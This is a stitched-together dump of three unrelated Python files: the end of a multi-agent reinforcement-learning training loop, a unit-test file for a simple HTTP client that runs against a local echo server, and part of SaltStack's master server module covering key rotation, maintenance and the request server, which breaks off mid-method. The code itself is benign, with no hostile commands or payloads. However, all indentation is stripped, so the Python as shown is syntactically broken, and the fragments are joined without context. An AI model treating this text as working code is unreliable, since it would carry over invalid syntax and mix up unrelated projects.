reward = torch.Tensor([reward_n])
x = torch.Tensor(np.concatenate(obs_n, axis=0)).view(1, -1)
memory.push(x, action, mask, next_x, reward)
for i, r in enumerate(reward_n):
agents_rew[i].append(r)
episode_reward += np.sum(reward_n)
obs_n = next_obs_n
n_update_iter = 5
if len(memory) > args.batch_size:
if total_numsteps % args.steps_per_actor_update == 0:
for _ in range(args.updates_per_step):
transitions = memory.sample(args.batch_size)
batch = Transition(*zip(*transitions))
policy_loss = agent.update_actor_parameters(batch, i, args.shuffle)
updates += 1
print('episode {}, p loss {}, p_lr {}'.
format(i_episode, policy_loss, agent.actor_lr))
if total_numsteps % args.steps_per_critic_update == 0:
value_losses = []
for _ in range(args.critic_updates_per_step):
transitions = memory.sample(args.batch_size)
batch = Transition(*zip(*transitions))
val_loss, _, _ = agent.update_critic_parameters(batch, i, args.shuffle)
value_losses.append(val_loss)
updates += 1
value_loss = np.mean(value_losses)
print('episode {}, q loss {}, q_lr {}'.
format(i_episode, value_loss, agent.critic_optim.param_groups[0]['lr']))
if args.target_update_mode == 'episodic':
hard_update(agent.critic_target, agent.critic)
if done_n[0] or terminal:
print('train epidoe reward', episode_reward)
episode_step = 0
break
if not args.fixed_lr:
agent.adjust_lr(i_episode)
# writer.add_scalar('reward/train', episode_reward, i_episode)
rewards.append(episode_reward)
# if (i_episode + 1) % 1000 == 0 or ((i_episode + 1) >= args.num_episodes - 50 and (i_episode + 1) % 4 == 0):
if (i_episode + 1) % args.eval_freq == 0:
tr_log = {'num_adversary': 0,
'best_good_eval_reward': best_good_eval_reward,
'best_adversary_eval_reward': best_adversary_eval_reward,
'exp_save_dir': exp_save_dir, 'total_numsteps': total_numsteps,
'value_loss': value_loss, 'policy_loss': policy_loss,
'i_episode': i_episode, 'start_time': start_time}
copy_actor_policy(agent, eval_agent)
test_q.put([eval_agent, tr_log])
env.close()
time.sleep(5)
done_training.value = True
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import functools
import os
import re
import sys
import time
import errno
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
from tornado.stack_context import StackContext
from salt.utils.ctx import RequestContext
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
Rotate the AES key rotation
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, **kwargs):
super(FileserverUpdate, self).__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
)
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue,
}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
'No update function for the %s filserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
'%s key missing from configuration. Falling back to '
'default interval of %d seconds',
interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
:param dict: The salt options
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
try:
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
except TypeError:
git_pillars = []
critical_errors.append(
'Invalid ext_pillar configuration. It is likely that the '
'external pillar type was not specified for one or more '
'external pillars.'
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
:key dict: The user starting the server and the AES key
:mkey dict: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
